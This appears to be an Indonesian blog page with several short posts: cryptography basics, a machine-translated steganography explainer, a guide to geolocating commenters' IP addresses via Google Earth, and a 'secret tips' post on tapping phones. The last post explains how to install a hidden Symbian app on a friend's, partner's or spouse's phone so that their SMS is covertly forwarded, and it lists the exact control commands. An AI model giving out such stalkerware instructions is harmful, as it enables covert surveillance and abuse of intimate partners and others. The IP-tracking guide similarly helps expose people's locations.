Kriptografi memungkinkan beberapa operasi atau proses terhadap data. Dua buah operasi dasar adalah enkripsi (dengan dekripsi sebagai proses balikannya) dan signing (dengan verifikasi dari signature sebagai proses balikannya). Enkripsi analog dengan memasukkan surat kedalam sebuah amplop sedangkan dekripsi analog dengan membuang amplop dan mengambil data. Signature analog dengan pemberian tanda-tangan terhadap sebuah dokumen dan penanda bahwa dokumen tersebut tidak berubah dari aslinya.
Kriptografi sesungguhnya merupakan studi terhadap teknik matematis yang terkait dengan aspek keamanan suatu sistem informasi, antara lain seperti kerahasiaan, integritas data, otentikasi, dan ketiadaan penyangkalan. Keempat aspek tersebut merupakan tujuan fundamental dari suatu sistem kriptografi.

1. Kerahasiaan (confidentiality)
Kerahasiaan adalah layanan yang digunakan untuk menjaga informasi dari setiap pihak yang tidak berwenang untuk mengaksesnya. Dengan demikian informasi hanya akan dapat diakses oleh pihak-pihak yang berhak saja.

2. Integritas data (data integrity)
Integritas data merupakan layanan yang bertujuan untuk mencegah terjadinya pengubahan informasi oleh pihak-pihak yang tidak berwenang. Untuk meyakinkan integritas data ini harus dipastikan agar sistem informasi mampu mendeteksi terjadinya manipulasi data. Manipulasi datayang dimaksud di sini meliputi penyisipan, penghapusan, maupun penggantian data.

3. Otentikasi (authentication)
Otentikasi merupakan layanan yang terkait dengan identifikasi terhadap pihak-pihak yang ingin mengakses sistem informasi (entity authentication) maupun keaslian data dari sistem informasi itu sendiri (data origin authentication).

4. Ketiadaan penyangkalan (non-repudiation)
Ketiadaan penyangkalan adalah layanan yang berfungsi untuk mencegah terjadinya penyangkalan terhadap suatu aksi yang dilakukan oleh pelaku sistem informasi.

Protokol Kriptografi
DAN
Slide Encryption Dan Digital Signature

Read More..

steganorgafi

Steganografi adalah seni dan ilmu menulis pesan tersembunyi sedemikian rupa sehingga tak seorang pun, selain pengirim dan penerima yang dituju, tersangka keberadaan pesan, suatu bentuk keamanan melalui ketidakjelasan . Kata steganografi adalah Yunani asal dan berarti "tulisan tersembunyi" dari kata Yunani steganos (στεγανός) yang berarti "ditutupi atau dilindungi", dan graphein (γράφειν) yang berarti "menulis". Penggunaan pertama yang tercatat dari istilah itu pada 1499 oleh Johannes Trithemius dalam bukunya Steganographia , sebuah risalah pada kriptografi dan steganografi menyamar sebagai buku sihir. Secara umum, pesan akan muncul menjadi sesuatu yang lain: foto, artikel, daftar belanja, atau tentang orang lain covertext dan, klasik, pesan tersembunyi mungkin dalam tinta tak terlihat antara garis terlihat dari surat pribadi.



Keuntungan dari steganografi, lebih dari kriptografi sendiri, adalah bahwa pesan yang tidak menarik perhatian kepada diri mereka sendiri. Jelas terlihat dienkripsi pesan-tak peduli bagaimana bisa dipecahkan-akan menimbulkan kecurigaan, dan di diri mereka memberatkan di negara-negara di mana enkripsi adalah ilegal. [1]Oleh karena itu, kriptografi sedangkan melindungi isi pesan, steganografi dapat dikatakan untuk melindungi pihak kedua pesan dan berkomunikasi.
Steganografi meliputi penyembunyian informasi dalam file komputer. Dalam steganografi digital, komunikasi elektronik dapat mencakup pengkodean steganographic dalam lapisan transportasi, seperti file dokumen, file gambar, program atau protokol. file media yang ideal untuk transmisi steganographic karena ukurannya yang besar. Sebagai contoh sederhana, pengirim mungkin mulai dengan file gambar tidak berbahaya dan menyesuaikan warna setiap 100 piksel untuk sesuai dengan huruf dalam alfabet, perubahan begitu halus bahwa seseorang tidak secara khusus mencarinya tidak mungkin untuk melihatnya.


Steganography

Read More..

Lacak lokasi IP pengguna internet dengan google earth

Lacak Lokasi Pengguna Internet lewat IP Menggunakan Google Earth

Berikut adalah langkah langkah melacak alamat seseorang lewat IP Adress menggunakan Google Earth :
  • Kita harus tahu dulu no IP yang kita cari ( contohnya : 125.162.8.77 )
  • buka pake browser ke http://www.geobytes.com/IpLocator.htm?
  • masukkan no IP di IP Address to locate ( IP Adress bisa kelihatan dari detail komentar yang ada di blog kita , atau lihat di akhir postingan ini )
  • Setelah no IP dimasukkan Klik Sumbit , maka akan muncul tampilan seperti di gambar, kemudian akan muncul beberapa info catat no Latitude : 3.5830 dan Longitude : 98.6670

  • Buka Google Earth ( kalau belum ada ya di download/instal dulu )
  • Masukkan no tadi di kotak pencarian dengan format Latitude, Longitude ( contohnya 3.5830 , 98.6670 ) . ingat pakai koma

  • Klik Fly To , atau Terbang Ke
  • Nah… akan muncul peta lokasi alamat IP yang tadi

  • Biar lebih detail di Google Earth sebelah kiri bawah di enable layer yang ingi dilihat ( misal nama jalan dsb ) Kalau untuk di kota kota besar terutama yang ada di eropa sono infonya akan lebih detail bahkan sampai nama gedung, nama toko, Bank dll
NB : Hasil yang didapat memang tidak 100% akurat tetapi minimal bisa membantu melacak daerah pengakses internet dengan IP tadi. dan menurut beberapa info dari teman ini juga merupakan salah satu cara yang dilakukan polisi untuk mengatasi kejahatan cyber.
jadi hati hati aja yang suka komentar, nyebar teror, ngisengin orang atau bahkan melakukan kejahatan lewat internet.

Read More..

Sadap ponsel

Tips Trik Rahasia Menyadap Hp dan SMS Teman/Pacar/Istri/Suami dll
penulis akan memberikan anda beberapa tips trik rahasia untuk menyadap sms nomer teman anda. Biasanya, trik ini digunakan para detektif tuk mensadap HP seseorang. Baik itu SMS maupun Telepon. ( kok saya bisa tahu trik ini?) Tetapi saya hanya akan menjelaskan kepada anda cara menyadap sms. Menakutkan bila menyadap/sadap telepon. Artikel ini hanya sebagai hiburan saja. Jangan memakainya dengan maksud jahat karena perbuatan dosa anda akan sangat besar. Tujuannya, supaya kita bisa setia dengan pacar kita, tidak ada yg berani selingkuh, dan supaya tidak ada teman kita yang menghianati kepercayaan. Kalo saya se..buat adek saya aja, soalnya dia nakal dan suka boong lwt sms. Anda mau tahu kan caranya?

Persyaratan yg harus dipenuhi :
HP adalah HP symbian. Baik HP anda maupun HP teman anda.
Merek NOKIA
Memiliki aplikasi simbyan smsanywherelite.sis

Nah..persyaratan itu harus anda lakukan sebelum anda mensadap sms. Hp anda harus symbian dan nokia ( kalo bisa). dan hp teman anda yang akan disadap juga symbian dan nokia. Kalo ga punya nokia, jangan teruskan baca artikel ini karena besar kemungkinan akan gagal. Ikuti instruksi berikut ini untuk menyadap dan sadap sms hp :
download smsanywherelite.sis untuk software menyadap
Masukkan aplikasi symbian itu di HP anda dan teman anda
Begitu aplikasi ini diinstal, kamu tidak bisa melihat program maupun ikon aplikasi itu dalam ponsel. Seluruh pengontrolannya harus lewat sms, mulai dari pengaktifan dan mematikan program, mengubah password, hingga pengiriman sms ke ponsel lain. Tapi justru itu keuntungannya jika digunakan sebagai alat sadap. Berarti sang target kan tidak tahu kalau diponselnya telah dipasangi aplikasi tersebut. Justru itu, teman anda tidak akan tahu kan kalo smsnya disadap? Karena aplikasi symbian ini belum mendukung GUI (Graphics User Interface).
Siapkan hp/ponsel korban anda
Siapkan HP anda yang akan menerima sms masuk dari korban anda.
Aktifkan aplikasi ini di ponsel korban kamu dengan mengetik format sms -[ SA(spasi)(password)(spasi)ON ]-. Panjang password maksimal 8 karakter. Misal, jika password kamu adalah 123456, ketikkan SA 123456 ON kirim sms ini ke nomor ponsel kedua/ponsel kamu. Untuk mematikannya, ketik SA 123456 OFF ke nomor yang sama.
Lalu, jika anda ingin menyadap lebih dari 5 hari..atau setiap sms masuk di hp korban akan selalu diteruskan ke hp anda, ketik sms ini di hp korban anda : SA(spasi)(password)(spasi)R1, misal SA 1234567 R1. Untuk mematikan fungsi ini ganti parameter di belakang “R” menjadi nol. Jadi, tuliskan SA 1234567 R0. Sedangkan untuk meneruskan setiap sms keluar, kirim sms bertuliskan SA 1234567 S1 ke nomer kamu. Matikan fungsi ini dengan mengirim SMS SA 1234567 S0
Sekarang, setiap korban menerima dan mengirim sms..kamu akan mendapat terusannya sama persis dengan sms aslinya

Ketahuan khan yang suka bohong???? hehe

Read More..

Blog Archive